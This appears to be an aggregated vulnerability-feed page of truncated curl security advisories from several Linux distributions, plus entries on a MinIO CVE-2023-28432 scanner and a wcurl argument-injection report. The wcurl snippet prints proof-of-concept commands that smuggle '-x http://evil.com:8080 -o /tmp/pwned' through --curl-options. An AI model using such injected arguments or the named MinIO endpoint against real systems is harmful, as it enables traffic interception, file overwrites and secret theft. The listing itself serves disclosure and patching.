A denial of service vulnerability exists in curl

A denial of service vulnerability exists in curl v8.1.0 in the way libcurl provides several different backends for resolving host names, selected at build time. If it is built to use the synchronous resolver, it allows name resolves to time-out slow operations using alarm and siglongjmp. When doi...

An allocation of resources without limits or throttling vulnerability exists in curl <v7.88.0

An allocation of resources without limits or throttling vulnerability exists in curl v7.88.0 based on the "chained" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with differentalgorithms. The number of acceptable "links" in this...

RHEL 9 : curl (RHSA-2026:1350)

The remote Redhat Enterprise Linux 9 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2026:1350 advisory. The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, a...

📄 MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner

This PHP script is a command-line vulnerability scanner designed to detect CVE-2023-28432 in MinIO servers. The vulnerability allows unauthenticated access to sensitive environment variables through the /minio/bootstrap/v1/verify endpoint...

ALSA-2026:1350 Moderate: curl security update

The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP. Security Fixes: curl: libcurl: Curl out of bounds read for cookie path CVE-2025-9086 For more details about the security issues, including...

A vulnerability in input validation exists in curl <8.0 during communication using the TELNET protocol may allow an attacker to pass on maliciously crafted user name and "telnet options" during server negotiation

A vulnerability in input validation exists in curl 8.0 during communication using the TELNET protocol may allow an attacker to pass on maliciously crafted user name and "telnet options" during server negotiation. The lack of proper input scrubbing allows an attacker to send content or perform...

curl: wcurl Argument Injection via Unquoted Variable

when i was code auditing curl i stumbled uppon a vulnerablity that was on wcurl affected version:current step 1: open terminal step 2:run pocs below wcurl --dry-run --curl-options='-x http://evil.com:8080 -o /tmp/pwned' https://example.com/test.txt wcurl --dry-run --curl-options='-o...

SUSE SLED15 / SLES15 Security Update : curl (SUSE-SU-2026:0221-1)

The remote SUSE Linux SLED15 / SLEDSAP15 / SLES15 / SLESSAP15 host has packages installed that are affected by a vulnerability as referenced in the SUSE-SU-2026:0221-1 advisory. - CVE-2025-14017: Fixed broken TLS options for threaded LDAPS bsc1256105. Tenable has extracted the preceding descripti...

Unity Linux 20.1050a / 20.1060a / 20.1070a Security Update: curl (UTSA-2026-004936)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-004936 advisory. When doing multi-threaded LDAPS transfers LDAP over TLS with libcurl, changing TLS options in one thread would inadvertently change them globally and therefore...

Unity Linux 20.1050a / 20.1060a / 20.1070a Security Update: curl (UTSA-2026-004937)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-004937 advisory. curl's code for managing SSH connections when SFTP was done using the wolfSSH powered backend was flawed and missed host verification mechanisms. This prevents curl...

Unity Linux 20.1050e / 20.1060e / 20.1070e Security Update: curl (UTSA-2026-004933)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-004933 advisory. curl's code for managing SSH connections when SFTP was done using the wolfSSH powered backend was flawed and missed host verification mechanisms. This prevents curl...

Unity Linux 20.1050e / 20.1060e / 20.1070e Security Update: curl (UTSA-2026-004929)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-004929 advisory. When doing SSH-based transfers using either SCP or SFTP, and asked to do public key authentication, curl would wrongly still ask and authenticate using a locally...

Unity Linux 20.1050e / 20.1060e / 20.1070e Security Update: curl (UTSA-2026-004930)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-004930 advisory. When an OAuth2 bearer token is used for an HTTPS transfer, and that transfer performs a cross-protocol redirect to a second URL that uses an IMAP, LDAP, POP3 or SMTP...

Unity Linux 20.1050e / 20.1060e / 20.1070e Security Update: curl (UTSA-2026-004931)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-004931 advisory. When doing SSH-based transfers using either SCP or SFTP, and setting the knownhosts file, libcurl could still mistakenly accept connecting to hosts not present in th...

Unity Linux 20.1050e / 20.1060e / 20.1070e Security Update: curl (UTSA-2026-004928)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-004928 advisory. When doing multi-threaded LDAPS transfers LDAP over TLS with libcurl, changing TLS options in one thread would inadvertently change them globally and therefore...

CLSA-2026-1769092364 curl: Fix of CVE-2025-9086

CVE-2025-9086: cookie: don't treat the leading slash as trailing...

Security update for curl

This update for curl fixes the following issues: CVE-2025-14017: Fixed broken TLS options for threaded LDAPS bsc1256105. Patch Instructions: To install this SUSE update use the SUSE recommended installation methods like YaST onlineupdate or "zypper patch". Alternatively you can run the command...

SUSE-SU-2026:0221-1 Security update for curl

This update for curl fixes the following issues: - CVE-2025-14017: Fixed broken TLS options for threaded LDAPS bsc1256105...

[SECURITY] Fedora 43 Update: curl-8.15.0-5.fc43

curl is a command line tool for transferring data with URL syntax, supporting FTP, FTPS, HTTP, HTTPS, SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS, FILE, IMA P, SMTP, POP3 and RTSP. curl supports SSL certificates, HTTP POST, HTTP PUT, FTP uploading, HTTP form based upload, proxies, cookies,...

Fedora 43 : curl (2026-e27b23af78)

The remote Fedora 43 host has a package installed that is affected by a vulnerability as referenced in the FEDORA-2026-e27b23af78 advisory. - fix broken TLS options for threaded LDAPS CVE-2025-14017 Tenable has extracted the preceding description block directly from the Fedora security advisory...